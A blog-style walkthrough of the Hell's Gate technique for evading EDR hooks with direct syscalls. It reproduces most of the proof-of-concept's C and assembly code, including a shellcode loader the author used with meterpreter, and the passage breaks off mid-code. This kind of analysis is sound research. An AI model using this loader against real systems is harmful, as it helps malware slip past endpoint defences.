Disclaimer
There is a great paper by the Hell's Gate authors, am0nsec and RtlMateusz. But as always, the best way for me to learn about a topic is to dig deep into it and give a presentation or write a blog post. I'm not making any claims; I'm just trying to understand Hell's Gate and share it with the infosec community. The Hell's Gate POC can be found here.
Introduction
To deal with user mode hooks placed by EDRs, an attacker (red team) can either remove them by unhooking or bypass them using direct or indirect syscalls. In this blog post I will focus on the Hell's Gate POC, which uses direct syscalls to bypass user mode hooks. Although the POC is a few years old, in my opinion it was one of the most important steps in the evolution of direct syscalls. I also want to understand the code better, which is reason enough to take a closer look at it.
In general, why was Hell's Gate introduced, or what problem does it solve? Instead of hardcoding System Service Numbers (SSNs) or syscall IDs into a direct syscall POC, the Hell's Gate technique allows us to dynamically retrieve the SSNs of native functions from ntdll.dll at runtime. But why do we need this? The reason is simple: SSNs can vary between Windows versions and builds, and in a real-world scenario or red team engagement we usually do not know which Windows version the target is running. Hardcoded SSNs are therefore risky and may fail.
Dynamic retrieval of SSNs
Regardless of whether we use a direct or indirect syscall shellcode loader, if we do not want to hardcode the SSNs of the native functions we use in our loader, we need to find a way to dynamically retrieve the SSNs from ntdll.dll at runtime. To achieve this, we can use several different techniques, as shown in the following examples.
- Using GetModuleHandleA and GetProcAddress
- PEB walk combined with EAT parsing
- Build your own GetModuleHandleA and GetProcAddress functions
I think the simplest technique in this case is to call GetModuleHandleA to get the base address of ntdll.dll, and then use GetProcAddress to get the memory address of a native function in ntdll.dll, e.g. NtAllocateVirtualMemory. However, from an opsec perspective this is not really recommended, because if GetModuleHandleA and/or GetProcAddress is hooked by the EDR, you will be caught. Therefore, among other things, we are going to take a closer look at how SSN retrieval is done in Hell's Gate by walking the PEB and parsing the EAT.
Hell's Gate in a nutshell
In short, based on various defined structures and functions, Hell's Gate makes it possible to execute direct syscalls by dynamically retrieving the required SSNs. It does so by combining a walk of the Process Environment Block (PEB), parsing the Export Address Table (EAT) of ntdll.dll, comparing the opcodes of the native functions' syscall stubs and extracting the SSNs from them. The main steps can be briefly described as follows.
- The first step is to access the Thread Environment Block (TEB)
- From there, access the PEB
- Go through the PEB and get the base address of ntdll.dll
- Access the EAT of ntdll.dll
- Use djb2 hashing on all native functions in the code
- Hash the function names retrieved from the EAT using the djb2 algorithm
- Compare the hashes of the names retrieved from the EAT with the precomputed hashes stored in the code
- If they match, store the function address in VX_TABLE as VX_TABLE_ENTRY.
- Based on the (absolute) function address, do an opcode comparison of the syscall stub of the native function in ntdll.dll to check if the function is hooked or not.
- Additionally, stop the comparison as soon as the opcodes of a syscall or ret instruction are reached, to avoid picking up the SSN of a wrong native function or syscall.
- Use the HellsGate function to prepare the execution of a direct syscall.
- Use the HellDescent function to execute the direct syscall
To get a better understanding of the Hell's Gate POC in detail, we will break it down and take a closer look at it. We will start by having a look at the manually defined structures.
Hell's Gate Structures
typedef struct _VX_TABLE_ENTRY {
    PVOID   pAddress;
    DWORD64 dwHash;
    WORD    wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
Starting at the top of the code, we can identify two defined structures called _VX_TABLE_ENTRY and _VX_TABLE. The first structure, _VX_TABLE_ENTRY, contains three members and is the template for the entries in the second structure or table, _VX_TABLE.
- pAddress holds the memory address of a native function, e.g. NtAllocateVirtualMemory
- dwHash stores the djb2 hash of a function name, e.g. NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b
- wSystemCall holds the SSN of a native function, e.g. NtAllocateVirtualMemory
typedef struct _VX_TABLE {
    VX_TABLE_ENTRY NtAllocateVirtualMemory;
    VX_TABLE_ENTRY NtProtectVirtualMemory;
    VX_TABLE_ENTRY NtCreateThreadEx;
    VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;
Based on _VX_TABLE_ENTRY, _VX_TABLE then holds pAddress, dwHash and wSystemCall for each entry in the table, and each entry represents one of the four native functions used in Hell's Gate. The _VX_TABLE contains all the data needed to prepare and execute the direct syscalls.
In short, these structures are used to store and organise the data that is later used in the code to execute direct syscalls, so that it can easily be looked up when needed. The syscalls are executed directly, not through ntdll.dll, so the function addresses and SSNs need to be stored somewhere, which is what these structures are used for.
Hell's Gate Functions
In the next step, Hell's Gate defines different types of functions that will be used in the code. Let us take a closer look at each function.
RtlGetThreadEnvironmentBlock
PTEB RtlGetThreadEnvironmentBlock();
The RtlGetThreadEnvironmentBlock() function is used to get a pointer (PTEB) to the TEB of the current thread, a data structure that stores information about the state of the current thread. Later we will see that we need the address of the TEB to get the address of the PEB.
PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
    return (PTEB)__readgsqword(0x30);
#else
    // The POC reads offset 0x16 here; the TEB self pointer is at FS:[0x18]
    return (PTEB)__readfsdword(0x18);
#endif
}
It checks the _WIN64 macro to determine if the code is being compiled for a 64-bit Windows platform. If it is, the intrinsic function __readgsqword(0x30) is used to read a quadword (64 bits) from offset 0x30 in the GS segment, where the TEB stores a pointer to itself on 64-bit Windows. If the code is compiled for a 32-bit Windows platform (_WIN64 is not defined), the intrinsic function __readfsdword is used instead to read a double word (32 bits) from the FS segment, which points to the TEB on 32-bit Windows. Note that the POC passes the offset 0x16 here, which looks like a typo: on 32-bit Windows the TEB's self pointer sits at offset 0x18, so the listing above uses 0x18. In both cases the value read is a pointer (PTEB) to the TEB, which is returned by the RtlGetThreadEnvironmentBlock function.
GetImageExportDirectory
BOOL GetImageExportDirectory(
_In_ PVOID pModuleBase,
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);
The purpose of the GetImageExportDirectory function is to retrieve the _IMAGE_EXPORT_DIRECTORY of a given module. Later, when we look at the main function, we will see that the GetImageExportDirectory function is used to get the address of the _IMAGE_EXPORT_DIRECTORY of the ntdll.dll module.
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
    // Get DOS header
    PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
    if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        return FALSE;
    }
    // Get NT headers
    PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
    if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
        return FALSE;
    }
    // Get the EAT
    *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
    return TRUE;
}
The GetImageExportDirectory function basically parses a module in memory to find and return a pointer to its export directory. This directory is crucial when the code needs to find a function exported by a DLL by name, as it references all the exported function names and their corresponding relative virtual addresses (RVAs).
Specifically, the GetImageExportDirectory function does the following:
- To read the structure of a PE file, we first need to get a pointer pImageDosHeader to the _IMAGE_DOS_HEADER. By checking the e_magic field we make sure that we are really reading a PE file. If it's not equal to the expected value (IMAGE_DOS_SIGNATURE), the function returns FALSE, indicating that the provided module is not a valid PE file.
- Once we have the address of the _IMAGE_DOS_HEADER, we can access e_lfanew, a field in the DOS header that contains the file offset to the NT headers. Again, validation is implemented by checking that the Signature field of the _IMAGE_NT_HEADERS matches IMAGE_NT_SIGNATURE.
- Finally, access the Export Address Table (EAT), which is reached via the DataDirectory array in the optional header (_IMAGE_OPTIONAL_HEADER): the first entry in the DataDirectory (index 0) holds the RVA of the _IMAGE_EXPORT_DIRECTORY, which contains information about the functions exported by the module, in the case of ntdll.dll e.g. NtAllocateVirtualMemory, NtProtectVirtualMemory etc.
Later we will see that the base address of ntdll.dll and the address of its _IMAGE_EXPORT_DIRECTORY are needed to access the following three entries in the _IMAGE_EXPORT_DIRECTORY:
- AddressOfFunctions
- AddressOfNames
- AddressOfNameOrdinals
These in turn are needed to finally get the (absolute) memory address of the native functions, e.g. NtAllocateVirtualMemory. But more on this later.
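To make the header walk described above more tangible, here is a minimal sketch that performs the same three checks on a plain byte buffer instead of the Windows structures. The helper names (rd16, rd32, export_dir_rva) are my own and not part of the POC, and the sketch assumes a 64-bit (PE32+) image, where DataDirectory[0] starts 0x88 bytes after the PE signature.

```c
#include <stdint.h>
#include <stddef.h>

/* Read little-endian values from a byte buffer without alignment assumptions. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns 1 and writes the export directory RVA of a
   PE32+ image, or returns 0 if one of the header checks fails. */
int export_dir_rva(const uint8_t *image, size_t size, uint32_t *rva) {
    if (size < 0x40 || rd16(image) != 0x5A4D)      /* e_magic must be "MZ" */
        return 0;
    uint32_t nt = rd32(image + 0x3C);              /* e_lfanew */
    if (nt > size || size - nt < 0x88 + 8)         /* NT headers must fit */
        return 0;
    if (rd32(image + nt) != 0x00004550)            /* Signature must be "PE\0\0" */
        return 0;
    if (rd16(image + nt + 0x18) != 0x20B)          /* optional header magic: PE32+ */
        return 0;
    /* 4 (signature) + 20 (file header) + 112 (DataDirectory offset) = 0x88 */
    *rva = rd32(image + nt + 0x88);
    return 1;
}
```

Adding the returned RVA to the module base gives the same pointer that GetImageExportDirectory stores in ppImageExportDirectory.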
djb2 Hashing
DWORD64 djb2(PBYTE str) {
    DWORD64 dwHash = 0x7734773477347734;
    INT c;
    while (c = *str++)
        dwHash = ((dwHash << 0x5) + dwHash) + c;
    return dwHash;
}
The djb2 function calculates the djb2 hash of a given string, here with a custom starting value instead of the usual 5381. Why is this function needed? Later we will see that in the context of the GetVxTableEntry function, djb2 is used to hash the name of each function in the EAT. These hashes are then compared to the dwHash field of the VX_TABLE_ENTRY structure passed in as pVxTableEntry.
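To experiment with the hashing outside of Visual Studio, here is a minimal, portable sketch of the same djb2 variant with the seed taken from the POC. The function name djb2_seeded and the use of standard C types instead of the Windows typedefs are my own assumptions.

```c
#include <stdint.h>

/* Hypothetical helper name; mirrors the POC's djb2 with its custom seed. */
uint64_t djb2_seeded(const char *str) {
    uint64_t hash = 0x7734773477347734ULL;   /* seed taken from the POC */
    unsigned char c;
    while ((c = (unsigned char)*str++) != 0) {
        /* hash * 33 + c, written as a shift and an add like in the POC */
        hash = ((hash << 5) + hash) + c;
    }
    return hash;
}
```

Feeding it the string NtAllocateVirtualMemory should reproduce the dwHash value that the POC stores for that entry, which is an easy way to check a port of the function.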
GetVxTableEntry
BOOL GetVxTableEntry(
_In_ PVOID pModuleBase,
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
_In_ PVX_TABLE_ENTRY pVxTableEntry
);
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
    PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
    PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
    PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
    for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
        PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
        PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
        if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
            pVxTableEntry->pAddress = pFunctionAddress;
            // Quick and dirty fix in case the function has been hooked
            WORD cw = 0;
            while (TRUE) {
                // check if syscall, in this case we are too far
                if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
                    return FALSE;
                // check if ret, in this case we are also probably too far
                if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
                    return FALSE;
                // First opcodes should be :
                //    MOV R10, RCX
                //    MOV EAX, <syscall>
                if (*((PBYTE)pFunctionAddress + cw) == 0x4c
                    && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
                    && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
                    && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
                    && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
                    && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
                    BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
                    BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
                    pVxTableEntry->wSystemCall = (high << 8) | low;
                    break;
                }
                cw++;
            };
        }
    }
    return TRUE;
}
In short, based on the base address of ntdll.dll and the _IMAGE_EXPORT_DIRECTORY, the GetVxTableEntry function is responsible for calculating the absolute address of a native function in the memory of ntdll.dll. It is also responsible for checking, by comparing opcodes, whether the native function is hooked or not. If it is not hooked, it retrieves the SSN and stores it in the wSystemCall member of the appropriate VX_TABLE_ENTRY. But to better understand this function, let us break it down.
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
    PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
    PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
    PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
    for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
        PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
        PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
        if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
            pVxTableEntry->pAddress = pFunctionAddress;
In the first part, GetVxTableEntry creates pointers to the AddressOfFunctions, AddressOfNames and AddressOfNameOrdinals arrays referenced by the _IMAGE_EXPORT_DIRECTORY. These arrays contain the relative virtual addresses (RVAs) of the functions, the RVAs of the function name strings and the indices that map each name to its slot in AddressOfFunctions, respectively.
It then iterates through all the function names in the AddressOfNames array. For each name, it calculates the djb2 hash and compares it to the hash passed in the VX_TABLE_ENTRY structure. If the hashes match, the function has been found. The absolute address of the function is calculated by adding the base address of ntdll.dll to the RVA of the function. This address is held in the pFunctionAddress variable and stored in the pAddress member of the VX_TABLE_ENTRY structure.
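The indirection through the ordinal array is easy to get wrong, so here is a small sketch of the lookup on mock data. The mock_exports type and the resolve_export function are hypothetical and heavily simplified: the names are ordinary C strings instead of RVAs, and strcmp is used in place of the djb2 hash comparison to keep the example short.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified stand-in for the three export arrays. */
typedef struct {
    const char *const *names;      /* plays the role of AddressOfNames        */
    const uint16_t    *ordinals;   /* plays the role of AddressOfNameOrdinals */
    const uint32_t    *functions;  /* plays the role of AddressOfFunctions    */
    uint32_t           count;      /* plays the role of NumberOfNames         */
} mock_exports;

/* Returns base + RVA for the export called name, or 0 if it is not exported. */
uintptr_t resolve_export(uintptr_t base, const mock_exports *e, const char *name) {
    for (uint32_t i = 0; i < e->count; i++) {
        if (strcmp(e->names[i], name) == 0) {
            /* The name index is not the function index: go through the ordinal. */
            uint16_t ordinal = e->ordinals[i];
            return base + e->functions[ordinal];
        }
    }
    return 0;
}
```

The important detail is that the index of a name in the name array is not used directly on the function array. It first selects an entry in the ordinal array, and only that value indexes the function RVAs.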
// Quick and dirty fix in case the function has been hooked
WORD cw = 0;
while (TRUE) {
    // check if syscall, in this case we are too far
    if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
        return FALSE;
    // check if ret, in this case we are also probably too far
    if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
        return FALSE;
    // First opcodes should be :
    //    MOV R10, RCX
    //    MOV EAX, <syscall>
    if (*((PBYTE)pFunctionAddress + cw) == 0x4c
        && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
        && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
        && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
        && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
        && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
        BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
        BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
        pVxTableEntry->wSystemCall = (high << 8) | low;
        break;
    }
In the second part of the GetVxTableEntry function, Hell's Gate starts at the address of the native function in the memory of ntdll.dll and compares the bytes of its syscall stub with the values expected for a clean stub: 0x4c, 0x8b, 0xd1 (mov r10, rcx) at offsets 0 to 2, 0xb8 (mov eax, imm32) at offset 3 and 0x00, 0x00 at offsets 6 and 7. The two bytes in between, at offsets 4 and 5, are not compared because they hold the SSN. If the pattern does not match at the current position, cw is incremented and the comparison is repeated one byte further.
If we look at the figure above, we can see that these values represent the opcodes of an unhooked or clean syscall stub of a native function. If the comparison succeeds, i.e. the native function is not hooked, the SSN is extracted and stored in the wSystemCall member of the corresponding VX_TABLE_ENTRY in _VX_TABLE. This procedure is done for all four functions in _VX_TABLE.
// check if syscall, in this case we are too far
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
    return FALSE;
// check if ret, in this case we are also probably too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
    return FALSE;
To avoid accidentally picking up the System Service Number (SSN) of another system call, the code uses two if statements at the start of the loop. These statements check for the syscall and ret instructions that mark the end of a syscall stub. If the loop encounters one of these instructions before finding the opcode sequence 0x4c, 0x8b, 0xd1, 0xb8, 0x00, 0x00, the scan has run past the expected position, so GetVxTableEntry returns FALSE and no SSN is extracted. This keeps the search inside the stub of the function we are actually looking for.
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;
To finally extract the SSN from the syscall stub, the code reads the bytes at offsets 5 and 4, counted from the 0x4c byte at offset 0. First the high byte (most significant byte, offset 5) of the syscall ID is read, then the low byte (least significant byte, offset 4). These two bytes are then combined to form the complete syscall ID.
The immediate operand is stored in memory in little-endian format (low byte at the lower address, high byte at the higher address). The code happens to read the high byte first and the low byte second, but the order of the reads does not matter: it shifts the high byte 8 places to the left (high << 8) and combines it with the low byte to construct the correct 16-bit syscall ID, respecting the little-endian format.
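The opcode check and the SSN extraction can be tried out on a plain byte array, without touching ntdll.dll at all. The following sketch follows the logic of the loop above; the function name extract_ssn is hypothetical, and unlike the POC the scan is bounded by an explicit length so that it cannot run off the end of the buffer.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: scans stub[0..len) like the POC's loop does.
   Returns 1 and writes the SSN on success, 0 if no clean pattern is found. */
int extract_ssn(const uint8_t *stub, size_t len, uint16_t *ssn) {
    for (size_t i = 0; i + 8 <= len; i++) {
        const uint8_t *p = stub + i;
        if (p[0] == 0x0f && p[1] == 0x05)   /* syscall: we went too far */
            return 0;
        if (p[0] == 0xc3)                   /* ret: we went too far as well */
            return 0;
        /* 4c 8b d1 = mov r10, rcx ; b8 imm32 = mov eax, imm32 */
        if (p[0] == 0x4c && p[1] == 0x8b && p[2] == 0xd1 && p[3] == 0xb8 &&
            p[6] == 0x00 && p[7] == 0x00) {
            uint8_t low  = p[4];            /* little-endian: low byte first */
            uint8_t high = p[5];
            *ssn = (uint16_t)((high << 8) | low);
            return 1;
        }
    }
    return 0;
}
```

A stub whose first bytes were replaced by a jmp (0xe9 followed by a 32-bit offset) no longer contains the expected pattern, so the function returns 0. This is exactly the situation in which Hell's Gate gives up on a hooked function.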
Payload
BOOL Payload(
_In_ PVX_TABLE pVxTable
);
BOOL Payload(PVX_TABLE pVxTable) {
    NTSTATUS status = 0x00000000;
    char shellcode[] = "\xfc\x48\x83";
    // Allocate memory for the shellcode
    PVOID lpAddress = NULL;
    SIZE_T sDataSize = sizeof(shellcode);
    HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
    status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
    // Write Memory
    VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
    // Change page permissions
    ULONG ulOldProtect = 0;
    HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
    status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
    // Create thread
    HANDLE hHostThread = INVALID_HANDLE_VALUE;
    HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
    status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
    // Wait for 1 seconds
    /*LARGE_INTEGER Timeout;
    Timeout.QuadPart = -10000000;*/
    HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
    status = HellDescent(hHostThread, FALSE, NULL);
    return TRUE;
}
The Payload function is nothing special. Based on the external functions HellsGate and HellDescent, it is simply responsible for executing the direct syscalls to allocate virtual memory, change the page protection and create a thread, and for copying the shellcode into the allocated memory in between. When running meterpreter shellcode, I observed that it was necessary to comment out the timeout part that belongs to the NtWaitForSingleObject call. Otherwise the execution of the meterpreter shellcode failed.
VxMoveMemory
PVOID VxMoveMemory(
_Inout_ PVOID dest,
_In_ const PVOID src,
_In_ SIZE_T len
);
The purpose of the VxMoveMemory function is to copy a block of memory from one location (src) to another (dest). It is similar in purpose to the memcpy function in the standard C library, but has a custom implementation for this code. The function is used to copy the shellcode into the allocated memory. In my opinion, this function is not essential and could be replaced by memcpy or the native NtWriteVirtualMemory function.
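Only the prototype is shown above, so here is a minimal sketch of what such a copy routine can look like. It is not the POC's exact code: the name move_bytes and the use of standard C types are my own assumptions, and the copy direction is chosen so that overlapping buffers are handled, similar to memmove.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for VxMoveMemory: an overlap-safe byte copy. */
void *move_bytes(void *dest, const void *src, size_t len) {
    unsigned char *d = (unsigned char *)dest;
    const unsigned char *s = (const unsigned char *)src;
    if ((uintptr_t)d < (uintptr_t)s) {
        /* copy forwards when the destination starts before the source */
        while (len--)
            *d++ = *s++;
    } else if ((uintptr_t)d > (uintptr_t)s) {
        /* copy backwards so overlapping bytes are read before being overwritten */
        d += len;
        s += len;
        while (len--)
            *--d = *--s;
    }
    return dest;
}
```

For the shellcode copy in Payload the two buffers never overlap, which is why a plain memcpy would work there as well.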
extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();
; Hell's Gate
; Dynamic system call invocation
;
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
.data
    wSystemCall DWORD 000h
.code
    HellsGate PROC
        mov wSystemCall, 000h
        mov wSystemCall, ecx
        ret
    HellsGate ENDP
    HellDescent PROC
        mov r10, rcx
        mov eax, wSystemCall
        syscall
        ret
    HellDescent ENDP
end
In addition, Hell's Gate defines two external functions called HellsGate and HellDescent, which will be used to prepare and execute direct system calls.
The first procedure, HellsGate, takes one argument (the system call number) in the ecx register. The instruction mov wSystemCall, 000h initialises the variable wSystemCall to zero, but the next instruction mov wSystemCall, ecx immediately overwrites it with the value in ecx. This procedure is used to store the system call number in the global variable wSystemCall for later use.
The second procedure, HellDescent, actually executes the system call. Under the Windows x64 calling convention, the first four arguments arrive in rcx, rdx, r8 and r9, and the kernel expects the system call number in the eax register. The procedure first copies rcx to r10, because the syscall instruction overwrites rcx with the return address, and then loads the system call number (SSN) from wSystemCall into eax. Finally, the syscall instruction is used to execute the syscall.
Hell's Gate Main Function
INT wmain() {
    PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
    PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
    if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
        return 0x1;
    // Get NTDLL module
    PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
    // Get the EAT of NTDLL
    PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
    if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
        return 0x01;
    VX_TABLE Table = { 0 };
    Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
    if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
        return 0x1;
    Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
    if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
        return 0x1;
    Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
    if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
        return 0x1;
    Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
    if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
        return 0x1;
    Payload(&Table);
    return 0x00;
}
Last but not least, let us have a look at the main function and try to understand how it all fits together. To do so, we will break down the main function of Hell's Gate.
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
To get the base address of ntdll.dll without using the GetModuleHandleA API, we need to go through the PEB, but first we need to declare a pointer pCurrentTeb to the TEB structure of the current thread.
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
Next, the pointer pCurrentPeb is declared, pointing to the PEB. Since pCurrentTeb points to the TEB, the PEB can be reached through its ProcessEnvironmentBlock member using the -> operator.
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
return 0x1;
In addition, Hell's Gate checks that the PEB and TEB have been successfully retrieved and that the major version of the operating system is 10. This means Hell's Gate expects to be running on Windows 10 (since the major version number of Windows 10 is 10, or 0xA in hex). If it's running on a different major version of Windows, the function will exit immediately with a return code of 0x1.
// Get NTDLL module
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
With the next line of code, Hell's Gate obtains a pointer of type PLDR_DATA_TABLE_ENTRY to the LDR_DATA_TABLE_ENTRY structure of the second module in the list, ntdll.dll, and stores it in the variable pLdrDataEntry. In my opinion, this line of code is very important for understanding the concept of going through the PEB (PEB walk) to get the base address of a module, so let's break it down and go through it step by step.
pCurrentPeb->LoaderData
This accesses the LoaderData member of the PEB structure. The LoaderData member points to a PEB_LDR_DATA structure which contains information about the modules (DLLs) that have been loaded into the process.
pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink
The InMemoryOrderModuleList member is a doubly linked list containing LDR_DATA_TABLE_ENTRY structures for each module, sorted in the order they were loaded into memory. The Flink member is a pointer to the next entry in the linked list. In this case it points to the entry for the main executable module of the process.
Additional information: A doubly linked list is a type of linked list in which each node contains a reference to both the next node and the previous node in the sequence.
pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink
By following the Flink member twice we now point to the second entry in the InMemoryOrderModuleList, which is usually the ntdll.dll module.
(PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10
This uses pointer arithmetic to subtract 0x10 (16 in decimal) from the address of the ntdll.dll entry in the InMemoryOrderModuleList. This step is necessary because the list links are embedded in a larger structure (LDR_DATA_TABLE_ENTRY) and Flink points at the InMemoryOrderLinks member, which is not the first member of that structure: on 64-bit Windows it sits at offset 0x10, right after InLoadOrderLinks. So subtracting 0x10 gives us the start of the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.
(PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)
Here we cast the resulting address to a PLDR_DATA_TABLE_ENTRY pointer. This gives us a pointer to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)
Finally, we store this pointer in the pLdrDataEntry variable. After this line of code, pLdrDataEntry points to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll. Based on this, we can access the base address of ntdll.dll in the next line of code.
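The walk described above can be reproduced on mock data to see why the subtraction is needed. The following sketch uses trimmed-down, hypothetical mirrors of the Windows structures (list_entry, mock_ldr_entry) and computes the offset with offsetof instead of hardcoding 0x10. The name field exists only for the demo and is not part of the real structure.

```c
#include <stddef.h>

/* Hypothetical, trimmed-down mirrors of LIST_ENTRY and LDR_DATA_TABLE_ENTRY. */
typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

typedef struct {
    list_entry  InLoadOrderLinks;            /* offset 0x00 */
    list_entry  InMemoryOrderLinks;          /* offset 0x10 on 64-bit builds */
    list_entry  InInitializationOrderLinks;
    void       *DllBase;
    const char *name;                        /* demo only, not in the real structure */
} mock_ldr_entry;

/* Follow Flink twice from the list head, then step back to the entry start. */
mock_ldr_entry *second_module(list_entry *head) {
    list_entry *link = head->Flink->Flink;
    return (mock_ldr_entry *)((unsigned char *)link -
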